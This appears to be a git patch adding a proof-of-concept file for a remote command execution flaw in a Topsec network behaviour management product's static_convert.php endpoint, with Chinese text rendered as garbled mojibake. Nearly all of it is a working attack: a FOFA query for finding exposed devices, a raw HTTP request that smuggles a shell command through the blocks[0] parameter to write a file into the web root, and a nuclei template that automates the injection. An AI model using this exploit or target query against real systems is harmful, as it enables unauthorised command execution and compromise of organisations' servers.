From d17eb72fdba1c7874c99b41cd9618ade6ab5a09b Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 3 Jan 2024 19:34:24 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=A4=A9=E8=9E=8D=E4=BF=A1TOPSEC=5Fst?=
 =?UTF-8?q?atic=5Fconvert=E8=BF=9C=E7=A8=8B=E5=91=BD=E4=BB=A4=E6=89=A7?=
 =?UTF-8?q?=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 ...瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊.md | 50 +++++++++++++++++++
 1 file changed, 50 insertions(+)
 create mode 100644 澶╄瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊.md
diff --git a/澶╄瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊.md b/澶╄瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊.md
new file mode 100644
index 0000000..da19006
--- /dev/null
+++ b/澶╄瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊.md
@@ -0,0 +1,50 @@
+## 澶╄瀺淇OPSEC_static_convert杩滅▼鍛戒护鎵ц婕忔礊
+
+## fofa
+```
+app="澶╄瀺淇-涓婄綉琛屼负绠$悊绯荤粺"
+```
+
+## poc
+```
+GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'pstvamqlkzrgslfilwvf'%20>>%20/var/www/html/rrlmkkyopirhaviko.txt%0A HTTP/1.1
+Host: 192.168.40.130:8443
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+
+```
+
+![46a8923aca7c87333e82efadd74cf08c](https://github.com/wy876/POC/assets/139549762/fed4855b-bedf-436b-ba41-9df02ee8ae6d)
+
+## nuclei
+```
+id: topsec-static_convert-rce
+
+info:
+ name: 澶╄瀺淇OPSEC static_convert 杩滅▼鍛戒护鎵ц婕忔礊
+ author: fgz
+ severity: critical
+ description: 澶╄瀺淇OPSEC瑙e喅鏂规鍖呮嫭缁煎悎绠$悊绯荤粺锛屽悇绫诲畨鍏ㄤ骇鍝佸闃茬伀澧欍乂PN銆佸畨鍏ㄧ綉鍏炽佸甯︾鐞嗐佸叆渚垫娴嬨佸唴瀹硅繃婊ゃ佷釜浜哄畨鍏ㄥ浠朵互鍙婄患鍚堝畨鍏ㄥ璁$郴缁熺瓑澶氱瀹夊叏鍔熻兘銆傝绯荤粺static_convert.php鎺ュ彛澶勫瓨鍦≧CE婕忔礊锛屼細瀵艰嚧鏈嶅姟鍣ㄥけ闄枫
+ metadata:
+ max-request: 1
+ fofa-query: app="澶╄瀺淇-涓婄綉琛屼负绠$悊绯荤粺"
+ verified: true
+variables:
+ file_name: "{{to_lower(rand_text_alpha(6))}}"
+ file_content: "{{to_lower(rand_text_alpha(15))}}"
+requests:
+ - raw:
+ - |+
+ GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'{{file_content}}'%20>>%20/var/www/html/{{file_name}}.txt%0A HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+
+ - |
+ GET /{{file_name}}.txt HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"
+```